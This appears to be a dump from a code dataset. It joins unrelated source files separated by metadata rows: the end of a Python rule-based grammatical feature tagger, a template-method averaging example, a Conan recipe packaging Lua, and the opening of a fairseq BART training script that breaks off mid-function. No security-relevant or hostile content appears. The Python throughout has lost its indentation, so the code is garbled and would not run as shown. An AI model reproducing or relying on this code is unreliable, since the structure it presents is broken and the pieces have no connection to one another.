if(word[0].lower()=="on" and next_word[0].lower()=="the"and second_next_word[0].lower()=="other" and third_next_word[0].lower()=="hand"):
wordList[i]=wordList[i].replace(word[1],"CONJ")
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
wordList[i+2]=wordList[i+2].replace(second_next_word[1],"NULL")
wordList[i+3]=wordList[i+3].replace(third_next_word[1],"NULL")
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
second_next_word = wordList[i+2].split('_')
third_next_word = wordList[i+3].split('_')
#tags emphatics
if word[0].lower() in ["just","really","most","more"]:
wordList[i]=wordList[i].replace(word[1],"EMPH")
word = wordList[i].split('_')
if((word[0].lower() in ["real","so"] and any(n in next_word for n in ["JJ","PRED"])) or
(word[0].lower() in do and any(n in next_word for n in v))):
wordList[i]=wordList[i].replace(word[1],"EMPH")
word = wordList[i].split('_')
if((word[0].lower() == "for" and next_word[0].lower()=="sure") or
(word[0].lower()=="a" and next_word[0].lower()=="lot") or
(word[0].lower()=="such" and next_word[0].lower()=="a")):
wordList[i]=wordList[i].replace(word[1],"EMPH")
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
#tags phrasal "and" coordination
if word[0].lower()=="and":
if((("RB" in previous_word and "RB" in next_word)) or
(any(n in previous_word for n in nn) and any(n in next_word for n in nn)) or
(any(n in previous_word for n in v) and any(n in next_word for n in v)) or
(any(n in previous_word for n in ["JJ","PRED"]) and any(n in next_word for n in ["JJ","PRED"]))):
wordList[i]=wordList[i].replace(word[1],"PHC")
word = wordList[i].split('_')
#tags pro-verb do
if word[0].lower() in do:
if (all(n not in next_word for n in v) and
("XX0" not in next_word) and
(all(n not in next_word for n in ["RB","XX0"]) and all(n not in second_previous_word for n in v)) and
(all(n not in next_word for n in ["RB","XX0"]) and ("RB" not in second_next_word )and all(n not in third_next_word for n in v)) and
(previous_word[0] not in symbols) and
((previous_word[0].lower() not in wp) or (previous_word[0].lower() not in who))):
wordList[i]+="_PROD"
word = wordList[i].split('_')
#tags WH questions
if (((word[0].lower() in symbols and word[0]!=',') and (next_word[0].lower() in who) and (next_word[0].lower() not in ["however","whatever"]) and ("MD" in second_next_word)) or
((word[0].lower() in symbols and word[0]!=',') and (next_word[0].lower() in who) and (next_word[0].lower() not in ["however","whatever"]) and ((second_next_word[0].lower() in do) or (second_next_word[0].lower() in have) or (second_next_word[0].lower() in be))) or
((word[0].lower() in symbols and word[0]!=',') and (second_next_word[0].lower())in who) and (second_next_word[0].lower() not in ["however","whatever"]) and (third_next_word[0].lower() in be)):
wordList[i+1]+="_WHQU"
next_word = wordList[i+1].split('_')
#tags sentence relatives
if(word[0].lower() in symbols and next_word[0].lower()=="which"):
wordList[i+1]+="_SERE"
next_word = wordList[i+1].split('_')
#tags perfect aspects
if word[0].lower() in have:
if (any(n in next_word for n in ["VBD","VBN"]) or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["VBD","VBN"])) or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in["RB","XX0"]) and any(n in third_next_word for n in ["VBD","VBN"])) or
(any(n in next_word for n in ["NN","NNP","PRP"]) and any(n in second_next_word for n in ["VBD","VBN"])) or
("XX0" in next_word and any(n in second_next_word for n in["NN","NNP","PRP"]) and any(n in third_next_word for n in ["VBN","VBD"]))):
wordList[i]+="_PEAS"
word = wordList[i].split('_')
#tags passives
if word[0].lower() in be or word[0].lower() in ["have","had","has","get"]:
if((any(n in next_word for n in ["VBD","VBN"])) or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["VBD","VBN"])) or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["RB","XX0"]) and any(n in third_next_word for n in ["VBD","VBN"])) or
("XX0" in next_word and any(n in second_next_word for n in ["NN","NNP","PRP"]) and any(n in third_next_word for n in ["VBD","VBN"])) or
(any(n in next_word for n in ["NN","NNP","PRP"]) and any(n in second_next_word for n in ["VBD","VBN"]))):
wordList[i] +="_PASS"
word = wordList[i].split('_')
#tags "by passives"
if word[0].lower() in be or word[0].lower() in ["have","had","has","get"]:
if ((any(n in next_word for n in ["VBD","VBN"]) and second_next_word[0].lower() =="by") or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["VBD","VBN"]) and third_next_word[0].lower()=="by") or
(any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["RB","XX0"]) and any(n in third_next_word for n in ["VBD","VBN"]) and fourth_next_word[0].lower()=="by") or
(any(n in next_word for n in ["NN","NNP","PRP"]) and any(n in second_next_word for n in ["VBD","VBN"]) and third_next_word[0].lower()=="by") or
("XX0" in next_word and any(n in second_next_word for n in ["NN","NNP","PRP"]) and any(n in third_next_word for n in ["VBD","VBN"]) and fourth_next_word[0].lower()=="by")):
if ("PASS" in wordList[i]):
wordList[i]=wordList[i].replace("PASS","BYPA")
else:
wordList[i]+="_BYPA"
word = wordList[i].split('_')
#tags be as main verb
if(("EX" not in second_previous_word and "EX" not in previous_word and word[0].lower() in be and any(n in next_word for n in ["CD","DT","PDT","PRPS","PRP","JJ","PRED","PIN","QUAN"])) or
("EX" not in second_previous_word and "EX" not in previous_word and word[0].lower() in be and any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["CD","DT","PDT","PRPS","PRP","JJ","PRED","PIN","QUAN"]))):
wordList[i] +="_BEMA"
word = wordList[i].split('_')
#tags wh clauses
if (any(n in word for n in suasive) or any(n in word for n in public) or any(n in word for n in private)) and (any(n in next_word for n in wp) or any(n in next_word for n in who)) and (all(n not in second_next_word for n in do) and all(n not in second_next_word for n in be) and all(n not in second_next_word for n in have) and ('MD' not in second_next_word)):
wordList[i+1]+="_WHCL"
next_word = wordList[i+1].split('_')
#tags pied-piping relative clauses
if "PIN" in word and next_word[0].lower() in ["who","whom","whose","which"]:
wordList[i+1]+="_PIRE"
next_word = wordList[i+1].split('_')
#tags stranded preposisitons
if "PIN" in word and next_word[0].lower()!="besides" and next_word[0].lower() in [",","."]:
wordList[i] +="_STPR"
word = wordList[i].split('_')
#tags split infinitives
if ((word[0].lower()=="to" and any(n in next_word for n in ["RB","AMPLIF","DWNT"]) and next_word[0].lower() in ["just","really","most","more"] and any(n in second_next_word for n in v)) or
(word[0].lower()=="to" and any(n in next_word for n in ["RB","AMPLIF","DWNT"]) and next_word[0].lower() in ["just","really","most","more"] and any(n in second_next_word for n in ["RB","AMPLIF","DOWNTON"]) and any(n in third_next_word for n in v))):
wordList[i] +="_SPIN"
word = wordList[i].split('_')
#tags split auxiliaries
if(((word[0].lower() in do or word[0].lower() in have or word[0].lower() in be or "MD" in word) and (any(n in next_word for n in ["RB","AMPLIF","DOWNTON"]) or (next_word[0].lower() in ["just","really","most","more"])) and any(n in second_next_word for n in v)) or
((word[0].lower() in do or word[0].lower() in have or word[0].lower() in be or "MD" in word) and (any(n in next_word for n in ["RB","AMPLIF","DOWNTON"]) or (next_word[0].lower() in ["just","really","most","more"])) and ("RB" in second_next_word) and any(n in third_next_word for n in v))):
wordList[i] +="_SPAU"
word = wordList[i].split('_')
#tags synthetic negation
if((word[0].lower()=="no" and any(n in next_word for n in ["JJ","PRED","NN","NNP"])) or
word[0].lower() =="neither" or
word[0].lower() =="nor"):
wordList[i] = wordList[i].replace(word[1],"SYNE")
word = wordList[i].split('_')
#tags time adverbials
if(word[0].lower() in timeABV):
wordList[i] = wordList[i].replace(word[1],"TIME")
word = wordList[i].split('_')
if(word[0].lower()=="soon" and next_word[0].lower()=="as"):
wordList[i] = wordList[i].replace(word[1],"TIME")
word = wordList[i].split('_')
#tags place adverbials
if word[0].lower() in placeABV and "NNP" not in word:
wordList[i] = wordList[i].replace(word[1],"PLACE")
word = wordList[i].split('_')
#tags 'that' verb complement
if((previous_word[0].lower() in ["and","nor","but","or","also"] or previous_word[0] in symbols )and word[0].lower()=="that" and (next_word[0].lower()=="there" or any(n in next_word for n in ["DT","QUAN","CD","PRP","NNS","NNP"])) or
((previous_word[0].lower() in public or previous_word[0].lower() in private or previous_word[0].lower() in suasive or (previous_word[0].lower() in ["seem","seems","seemed","seeming","appear","appears","appeared","appearing"] and any(n in previous_word for n in v))) and word[0].lower()=="that" and (next_word[0].lower() in do or next_word[0].lower() in be or next_word[0].lower() in have) or any(n in next_word for n in v) or "MD" in next_word or next_word[0].lower()=="and") or
((fourth_previous_word[0] in public or fourth_previous_word[0] in private or fourth_previous_word[0] in suasive) and "PIN" in third_previous_word and any(n in second_previous_word for n in nn) and any(n in previous_word for n in nn) and word[0].lower() =="that") or
((fifth_previous_word[0] in public or fifth_previous_word[0] in private or fifth_previous_word[0] in suasive ) and "PIN" in fourth_previous_word and any(n in third_previous_word for n in nn) and any(n in second_previous_word for n in nn) and any(n in previous_word for n in nn) and word[0].lower() =="that") or
((sixth_previous_word[0] in public or sixth_previous_word[0] in private or sixth_previous_word[0] in suasive ) and "PIN" in fifth_previous_word and any(n in fourth_previous_word for n in nn) and any(n in third_previous_word for n in nn) and any(n in second_previous_word for n in nn) and any(n in previous_word for n in nn) and word[0].lower() =="that")):
if(word[0].lower()=="that"):
wordList[i] = wordList[i].replace(word[1],"THVC")
word = wordList[i].split('_')
#tags 'that' adjective complementss
if (any(n in previous_word for n in ["JJ","PRED"]) and word[0].lower()=="that"):
wordList[i] = wordList[i].replace(word[1],"THAC")
word = wordList[i].split('_')
#tags present participial clauses
if previous_word[0] in symbols and "VBG" in word and (any(n in next_word for n in ["PIN","DT","QUAN","CD","WPs","PRP","RB"]) or next_word[0].lower() in wp or next_word[0].lower() in who):
wordList[i] += "_PRESP"
word = wordList[i].split('_')
#tags past participial clauses
if previous_word[0] in symbols and "VBN" in word and any(n in next_word for n in ["PIN","RB"]):
wordList[i] += "_PASTP"
word = wordList[i].split('_')
#tags past participial WHIZ deletion relatives
if (any(n in wordList[i-1] for n in nn) or ("QUPR" in previous_word)) and ("VBN" in word) and (any(n in next_word for n in ["PIN","RB"]) or (next_word[0].lower() in be)):
wordList[i] += "_WZPAST"
word = wordList[i].split('_')
#tags present participial WHIZ deletion relatives
if any(n in previous_word for n in nn) and "VBG" in word:
wordList[i] += "_WZPRES"
word = wordList[i].split('_')
#tags "that" relative clauses on subject position
if ((any(n in previous_word for n in nn) and (word[0].lower()=="that") and (any(n in next_word for n in v) or "MD" in next_word or next_word[0].lower() in do or next_word[0].lower() in be or next_word[0].lower() in have)) or
(any(n in previous_word for n in nn) and (word[0].lower()=="that") and any(n in next_word for n in ["RB","XX0"]) and (any(n in second_next_word for n in v) or "MD" in second_next_word or second_next_word[0].lower() in do or second_next_word[0].lower() in be or second_next_word[0].lower() in have)) or
(any(n in previous_word for n in nn) and (word[0].lower()=="that") and any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["RB","XX0"]) and (any(n in third_next_word for n in v) or "MD" in third_next_word or third_next_word[0].lower() in do or third_next_word[0].lower() in be or third_next_word[0].lower() in have))):
wordList[i] = wordList[i].replace(word[1],"TSUB")
word = wordList[i].split('_')
#tags "that" relative clauses on object positionW
if((any(n in previous_word for n in nn) and (word[0].lower() =="that") and (next_word[0].lower() in ["it","i","we","he","she","they"] or any(n in next_word for n in ["DT","QUAN","CD","JJ","NNS","NNP","PRPS"])))or
(any(n in previous_word for n in nn) and (word[0].lower()=="that") and any(n in next_word for n in nn) and "POS" in second_next_word)):
wordList[i] = wordList[i].replace(word[1],"TOBJ")
word = wordList[i].split('_')
#tags WH relative clauses on subject position
if((all(n not in third_previous_word[0].lower() for n in narrative) and any(n in previous_word for n in nn) and (word[0].lower() in wp) and ((next_word[0].lower() in do) or (next_word[0].lower() in be) or (next_word[0].lower() in have) or any(n in next_word for n in v) or ("MD" in next_word))) or
(all(n not in third_previous_word[0].lower() for n in narrative) and any(n in previous_word for n in nn) and (word[0].lower() in wp) and any(n in next_word for n in ["RB","XX0"]) and(second_next_word[0].lower() in do or second_next_word[0].lower() in be or second_next_word[0].lower() in have or any(n in second_next_word for n in v) or "MD" in second_next_word)) or
(all(n not in third_previous_word[0].lower() for n in narrative) and any(n in previous_word for n in nn) and (word[0].lower() in wp) and any(n in next_word for n in ["RB","XX0"]) and any(n in second_next_word for n in ["RB","XX0"]) and (third_next_word[0].lower() in do or third_next_word[0].lower() in be or third_next_word[0].lower() in have or any(n in third_next_word for n in v) or "MD" in third_next_word))):
wordList[i] +="_WHSUB"
word = wordList[i].split('_')
#tags WH relative clauses on object position
if(all(n not in third_previous_word[0].lower() for n in narrative) and any(n in previous_word for n in nn) and (word[0].lower() in wp) and ((next_word[0].lower() not in do) and (next_word[0].lower() not in be) and (next_word[0].lower() not in have) and all(n not in next_word for n in v) and all(n not in next_word for n in ["MD","RB","XX0"]))):
wordList[i] += "_WHOBJ"
word = wordList[i].split('_')
#tags hedges
if word[0].lower()=="maybe":
wordList[i]= wordList[i].replace(word[1],"HDG")
word = wordList[i].split('_')
if((word[0].lower()=="at" and next_word[0].lower()=="about") or
(word[0].lower()=="something" and next_word[0].lower()=="like")):
wordList[i]= wordList[i].replace(word[1],"HDG")
wordList[i+1]= next_word[0].lower()+"_NULL"
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
if word[0].lower()=="more" and next_word[0].lower()=="or" and second_next_word[0].lower()=="less":
wordList[i]= wordList[i].replace(word[1],"HDG")
wordList[i+1]= next_word[0].lower()+"_NULL"
wordList[i+2]= second_next_word[0].lower()+"_NULL"
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
second_next_word = wordList[i+2].split('_')
if (((any(n in second_previous_word for n in ["DT","QUAN","CD","JJ","PRED","PRPS"]) or second_previous_word[0].lower() in who) and previous_word[0].lower()=="sort" and word[0].lower()=="of")or
((any(n in second_previous_word for n in ["DT","QUAN","CD","JJ","PRED","PRPS"]) or second_previous_word[0].lower() in who) and previous_word[0].lower()=="kind" and word[0].lower()=="of")):
wordList[i]= wordList[i].replace(word[1],"HDG")
wordList[i-1]= previous_word[0].lower()+"_NULL"
word = wordList[i].split('_')
previous_word = wordList[i-1].split('_')
#tags discourse particles
if (previous_word[0] in symbols) and (word[0].lower() in ["well","now","anyhow","anyways"]):
wordList[i] =wordList[i].replace(word[1],"DPAR")
word = wordList[i].split('_')
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
#tags demonstrative pronouns
if (((word[0].lower() in ["that","this","these","those"]) and ("NULL" not in word) and ((next_word[0].lower() in do) or (next_word[0].lower() in be) or (next_word[0].lower() in have) or (next_word[0].lower() in wp) or any(n in next_word for n in v) or( "MD" in next_word) or (next_word[0].lower()=="and") or (next_word[0] in symbols)) and all(n not in word for n in ["TOBJ","TSUB","THAC","THVC"])) or
((word[0].lower()=="that") and (next_word[0].lower() in ["'s","is"]))):
wordList[i] = wordList[i].replace(word[1],"DEMP")
word = wordList[i].split('_')
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
#tags demonstratives
if word[0].lower() in ["that","this","these","those"] and all(n not in word for n in ["DEMP","TOBJ","TSUB","THAC","THVC","NULL"]):
wordList[i] = wordList[i].replace(word[1],"DEMO")
word = wordList[i].split('_')
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-4:
fourth_next_word = wordList[i+4].split('_')
else:
fourth_next_word = ['','NULL']
if i<len(wordList)-3:
third_next_word = wordList[i+3].split('_')
else:
third_next_word = ['','NULL']
if i<len(wordList)-2:
second_next_word = wordList[i+2].split('_')
else:
second_next_word = ['','NULL']
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
#tags subordinator-that deletion
if (((word[0].lower() in public or word[0].lower() in private or word[0].lower() in suasive) and (next_word[0].lower() in ["i","we","she","he","they"] or "DEMP" in next_word)) or
((word[0].lower() in public or word[0].lower() in private or word[0].lower() in suasive) and (["PRP"] in next_word or any(n in next_word for n in nn)) and (second_next_word[0].lower() in do or second_next_word[0].lower() in have or second_next_word[0].lower() in be or any(n in second_next_word for n in v) or "MD" in second_next_word)) or
((word[0].lower() in public or word[0].lower() in private or word[0].lower() in suasive) and any(n in next_word for n in ["JJ","PRED","RB","DT","QUAN","CD","PRPS"]) and any(n in second_next_word for n in nn) and (third_next_word[0].lower() in do or third_next_word[0].lower() in have or third_next_word[0].lower() in be or any(n in third_next_word for n in v) or "MD" in third_next_word)) or
((word[0].lower() in public or word[0].lower() in private or word[0].lower() in suasive) and any(n in next_word for n in ["JJ","PRED","RB","DT","QUAN","CD","PRPS"]) and any(n in second_next_word for n in ["JJ","PRED"]) and any(n in third_next_word for n in nn) and (fourth_next_word[0].lower() in do or fourth_next_word[0].lower() in have or fourth_next_word[0].lower() in be or any(n in fourth_next_word for n in v) or "MD" in fourth_next_word))):
wordList[i] += "_THATD"
word = wordList[i].split('_')
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
#tags independent clause coordination
if (((previous_word[0]==",") and ("and" in word) and (any(n in next_word for n in ["it","so","then","you","u","we","he","she","they"]) or ("DEMP" in next_word))) or
((previous_word[0]==",") and ("and" in word) and (next_word[0].lower()=="there") and any(n in second_next_word for n in be)) or
((previous_word[0] in symbols) and ("and" in word)) or
(("and" in word) and (any(n in next_word for n in wp) or any(n in next_word for n in who) or any(n in next_word for n in ["because","although","though","tho","if","unless"]) or any(n in next_word for n in ["OSUB","DPAR","CONJ"])))):
wordList[i] = wordList[i].replace(word[1],"ANDC")
word = wordList[i].split('_')
for i in range(len(wordList)):
word = wordList[i].split('_')
#basic tags
if word[0].lower() in ["absolutely","altogether","completely","enormously","entirely","extremely","fully","greatly","highly","intensely","perfectly","strongly","thoroughly","totally","utterly","very"]:
wordList[i] = wordList[i].replace(word[1],"AMP")
word = wordList[i].split('_')
if word[0].lower() in ["almost","barely","hardly","merely","mildly","nearly","only","partially","partly","practically","scarcely","slightly","somewhat"]:
wordList[i] = wordList[i].replace(word[1],"DWNT")
word = wordList[i].split('_')
if ("tion"in word[0].lower() or "ment" in word[0].lower() or "ness" in word[0].lower() or "nesses" in word[0].lower() or "ity" in word[0].lower() or "ities" in word[0].lower()) and any(n in word for n in nn):
wordList[i] = wordList[i].replace(word[1],"NOMZ")
word = wordList[i].split('_')
if ("ing" in word[0].lower() and any(n in word for n in nn)) or ("ings" in word[0].lower() and any(n in word for n in nn)):
wordList[i] = wordList[i].replace(word[1],"GER")
word = wordList[i].split('_')
if any(n in word for n in nn):
wordList[i] = wordList[i].replace(word[1],"NN")
word = wordList[i].split('_')
if any(n in word for n in ["JJS","JJR"]):
wordList[i] = wordList[i].replace(word[1],"JJ")
word = wordList[i].split('_')
if any(n in word for n in ["RBS","RBR","WRB"]):
wordList[i] = wordList[i].replace(word[1],"RB")
word = wordList[i].split('_')
if any(n in word for n in ["VBP","VBZ"]):
wordList[i] = wordList[i].replace(word[1],"VPRT")
word = wordList[i].split('_')
if word[0].lower() in ["I","me","we","us","my","our","myself","ourselves"]:
wordList[i] = wordList[i].replace(word[1],"FPP1")
word = wordList[i].split('_')
if word[0].lower() in ["you","your","yourself","yourselves","thy","thee","thyself","thou"]:
wordList[i] = wordList[i].replace(word[1],"SPP2")
word = wordList[i].split('_')
if word[0].lower() in ["she","he","they","her","his","them","him","their","himself","herself","themselves"]:
wordList[i] = wordList[i].replace(word[1],"TPP3")
word = wordList[i].split('_')
if word[0].lower() in ["it","its","itself"]:
wordList[i] = wordList[i].replace(word[1],"PIT")
word = wordList[i].split('_')
if word[0].lower() in ["because"]:
wordList[i] = wordList[i].replace(word[1],"CAUS")
word = wordList[i].split('_')
if word[0].lower() in ["although","though","tho"]:
wordList[i] = wordList[i].replace(word[1],"CONC")
word = wordList[i].split('_')
if word[0].lower() in ["if","unless"]:
wordList[i] = wordList[i].replace(word[1],"COND")
word = wordList[i].split('_')
if (word[0].lower() in ["can","may","might","could"]) or ("ca" in word[0].lower() and "MD" in word):
wordList[i] = wordList[i].replace(word[1],"POMD")
word = wordList[i].split('_')
if word[0].lower() in ["ought","should","must"]:
wordList[i] = wordList[i].replace(word[1],"NEMD")
word = wordList[i].split('_')
if (word[0].lower() in ["would","shall"]) or (("will" in word[0].lower() or "ll" in word[0].lower() or "wo" in word[0].lower() or "sha" in word[0].lower() or "'d" in word[0].lower()) and "MD" not in word):
wordList[i] = wordList[i].replace(word[1],"PRMD")
word = wordList[i].split('_')
if word[0].lower() in public:
wordList[i] += "_PUBV"
word = wordList[i].split('_')
if word[0].lower() in private:
wordList[i] += "_PRIV"
word = wordList[i].split('_')
if word[0].lower() in suasive:
wordList[i] += "_SUAV"
word = wordList[i].split('_')
if word[0].lower() in ["seem","seems","seemed","seeming","appear","appears","appeared","appearing"] and any(n in word for n in v):
wordList[i] += "_SMP"
word = wordList[i].split('_')
if (word[0].lower() in ["\'ll","\'d"] or ("n\'t" in word[0].lower() and "XX0" in word) or ("\'" in word[0].lower() and any(n in word for n in v))):
wordList[i] += "_CONT"
word = wordList[i].split('_')
return wordList
def merged():
printWithTime("Merged files tagging progress started")
wordList = MergedfolderProcess()
finishedList = getFinishedFiles("merged")
for file in wordList:
if file in finishedList:
printWithTime("File: "+file+" has been processed, now moving to the next file")
continue
else:
printWithTime("Now processing file: "+file+"...")
filepath = os.path.join(directory_path,"MergedFiles")
filepath = os.path.join(filepath,file)
with open(filepath,'r') as filecontent:
data = filecontent.read().replace('\n',' ')
tagger(data,file,False)
printWithTime("Tag generation complete: "+file+"")
finishedFileRecorder = open(os.path.join(directory_path,'mList.txt'),'a')
finishedFileRecorder.write(file+"\n")
printWithTime("Tagging program finished\nPlease use tagger-count.py to generate analysis data")
return
def fragments():
printWithTime("File fragments tagging progress started")
wordList = FragmentfolderProcess()
finishedList = getFinishedFiles("fragment")
for file in wordList:
if file in finishedList:
printWithTime("File: "+file+" has been processed, now moving to the next file")
continue
else:
printWithTime("Now processing file: "+file+"...")
filepath = os.path.join(directory_path,"FileFragments")
filepath = os.path.join(filepath,file)
with open(filepath,'r') as filecontent:
data = filecontent.read().replace('\n',' ')
tagger(data,file,True)
printWithTime("Tag generation complete: "+file+"")
finishedFileRecorder = open(os.path.join(directory_path,'fList.txt'),'a')
finishedFileRecorder.write(file+"\n")
printWithTime("Tagging program finished\nPlease use tagger-count.py -f true to generate analysis data")
parser = argparse.ArgumentParser(description="MAT tagging algorithm")
parser.add_argument('-f','--fragment',type=str,default="false",help='To generate tags for merged files, set this value to false; To generate tags for file fragments, set this value to true')
parser.add_argument('-r','--restart',type=str,default="false",help='If you want to restart the program to let it process from beginning, set this value to true; otherwise, set it to false')
if not os.path.exists('Results'):
os.mkdir(os.path.join(os.getcwd(),'Results'))
os.chdir(os.path.join(os.getcwd(),'Results'))
if not os.path.exists('StanfordTags'):
os.mkdir(os.path.join(os.getcwd(),'StanfordTags'))
if not os.path.exists('ModifiedTags'):
os.mkdir(os.path.join(os.getcwd(),'ModifiedTags'))
if not os.path.exists('StanfordTagsFragment'):
os.mkdir(os.path.join(os.getcwd(),'StanfordTagsFragment'))
if not os.path.exists('ModifiedTagsFragment'):
os.mkdir(os.path.join(os.getcwd(),'ModifiedTagsFragment'))
os.chdir('..')
args = parser.parse_args()
if args.fragment == "true":
if args.restart == "true":
if os.path.exists('fList.txt'):
os.remove(os.path.join(directory_path,'fList.txt'))
fragments()
else:
if args.restart == "true":
if os.path.exists('mList.txt'):
os.remove(os.path.join(directory_path,'mList.txt'))
merged()
| 71.853022
| 3,008
| 0.580569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 15,578
| 0.297807
|
b2a64ad7dcb9aaa41898aea3c2d8af7ef4fc0f3f
| 1,582
|
py
|
Python
|
template.py
|
deepak7376/design_pattern
|
855aa0879d478f7b2682c2ae5e92599b5c81a1c6
|
[
"MIT"
] | null | null | null |
template.py
|
deepak7376/design_pattern
|
855aa0879d478f7b2682c2ae5e92599b5c81a1c6
|
[
"MIT"
] | null | null | null |
template.py
|
deepak7376/design_pattern
|
855aa0879d478f7b2682c2ae5e92599b5c81a1c6
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class AverageCalculator(ABC):
def average(self):
try:
num_items = 0
total_sum = 0
while self.has_next():
total_sum += self.next_item()
num_items += 1
if num_items == 0:
raise RuntimeError("Can't compute the average of zero items.")
return total_sum / num_items
finally:
self.dispose()
@abstractmethod
def has_next(self):
pass
@abstractmethod
def next_item(self):
pass
def dispose(self):
pass
class FileAverageCalculator(AverageCalculator):
def __init__(self, file):
self.file = file
self.last_line = self.file.readline()
def has_next(self):
return self.last_line != ''
def next_item(self):
result = float(self.last_line)
self.last_line = self.file.readline()
return result
def dispose(self):
self.file.close()
class MemoryAverageCalculator(AverageCalculator):
def __init__(self, lst):
self.lst = lst
self.index = 0
def has_next(self):
return self.index<len(self.lst)
def next_item(self):
result = float(self.lst[self.index])
self.index+=1
return result
def dispose(self):
pass
mac = MemoryAverageCalculator([3, 1, 4, 1, 5, 9, 2, 6, 5, 3])
print(mac.average()) # Call the template method
# fac = FileAverageCalculator(open('data.txt'))
# print(fac.average()) # Call the template method
| 21.972222
| 78
| 0.583439
| 1,326
| 0.83818
| 0
| 0
| 107
| 0.067636
| 0
| 0
| 166
| 0.10493
|
b2a90936580b1ab7bbc9587223bca80795b6020a
| 2,906
|
py
|
Python
|
conanfile.py
|
helmesjo/conan-lua
|
da8f0c54ac9d1949c6ac64d9ab64639df8226061
|
[
"MIT"
] | null | null | null |
conanfile.py
|
helmesjo/conan-lua
|
da8f0c54ac9d1949c6ac64d9ab64639df8226061
|
[
"MIT"
] | 1
|
2019-12-26T18:53:06.000Z
|
2020-02-12T13:45:40.000Z
|
conanfile.py
|
helmesjo/conan-lua
|
da8f0c54ac9d1949c6ac64d9ab64639df8226061
|
[
"MIT"
] | null | null | null |
from conans import ConanFile, CMake, tools
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
class LuaConan(ConanFile):
name = "Lua"
version = "5.3.5"
description = "Lua is a powerful, fast, lightweight, embeddable scripting language."
# topics can get used for searches, GitHub topics, Bintray tags etc. Add here keywords about the library
topics = ("conan", "lua", "scripting", "embedded")
url = "https://github.com/helmesjo/conan-lua"
homepage = "https://www.lua.org"
author = "helmesjo <helmesjo@live.com>"
license = "MIT" # Indicates license type of the packaged library; please use SPDX Identifiers https://spdx.org/licenses/
exports = ["LICENSE.md"] # Packages the license for the conanfile.py
# Remove following lines if the target lib does not use cmake.
exports_sources = ["CMakeLists.txt"]
generators = "cmake"
# Options may need to change depending on the packaged library.
settings = "os", "arch", "compiler", "build_type"
options = {"shared": [False], "fPIC": [True, False]}
default_options = {"shared": False, "fPIC": True}
# Custom attributes for Bincrafters recipe conventions
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
requires = ()
def config_options(self):
if self.settings.os == 'Windows':
del self.options.fPIC
def source(self):
source_url = "https://www.lua.org"
tools.get("{0}/ftp/lua-{1}.tar.gz".format(source_url, self.version), sha256="0c2eed3f960446e1a3e4b9a1ca2f3ff893b6ce41942cf54d5dd59ab4b3b058ac")
extracted_dir = "lua-" + self.version
# Rename to "source_subfolder" is a convention to simplify later steps
os.rename(extracted_dir, self._source_subfolder)
# For some reason uid & gid are wrong in some situations when renaming the unziped tar (happened in docker-in-docker configuration)
# Set it explicitly to match the current user & group
if os.name == "posix":
if os.system("chown -R {0}:{1} {2}".format(os.getuid(), os.getgid(), self._source_subfolder)) != 0:
self.output.error("Failed to change owner of source to current user & group id ({0}:{1})".format(os.getuid(), os.getgid()))
def _configure_cmake(self):
cmake = CMake(self)
cmake.definitions["SOURCE_SUBDIR"] = self._source_subfolder
cmake.configure(build_folder=self._build_subfolder)
return cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
self.cpp_info.includedirs.append("include/lua")
| 42.735294
| 151
| 0.66724
| 2,795
| 0.961803
| 0
| 0
| 0
| 0
| 0
| 0
| 1,297
| 0.446318
|
b2a93406f378840531084977a82ef40530d2aedf
| 3,800
|
py
|
Python
|
train.py
|
mcao610/My_BART
|
0f5963ff8688986e28b2ff94a9cc7a3a0adcf3a3
|
[
"MIT"
] | null | null | null |
train.py
|
mcao610/My_BART
|
0f5963ff8688986e28b2ff94a9cc7a3a0adcf3a3
|
[
"MIT"
] | null | null | null |
train.py
|
mcao610/My_BART
|
0f5963ff8688986e28b2ff94a9cc7a3a0adcf3a3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import torch
import logging
import torch.distributed as dist
import torch.multiprocessing as mp
from torch.utils.data import Dataset, DataLoader, BatchSampler
from torch.utils.data.distributed import DistributedSampler
from fairseq.tasks.translation import TranslationTask
from fairseq.data.language_pair_dataset import collate
from modules.data_utils import FairseqDataset
from modules.trainer import Trainer
from modules.utils import init_arg_parser
logging.basicConfig(
format='%(asctime)s | %(levelname)s | %(name)s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
stream=sys.stdout,
)
logger = logging.getLogger('fairseq.train')
def cleanup():
dist.destroy_process_group()
def setup(rank, world_size):
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '12355'
# initialize the process group
dist.init_process_group("nccl", rank=rank, world_size=world_size)
def load_dictionary(path, src_dict_name='source', tgt_dict_name='target'):
"""Load source & target fairseq dictionary.
"""
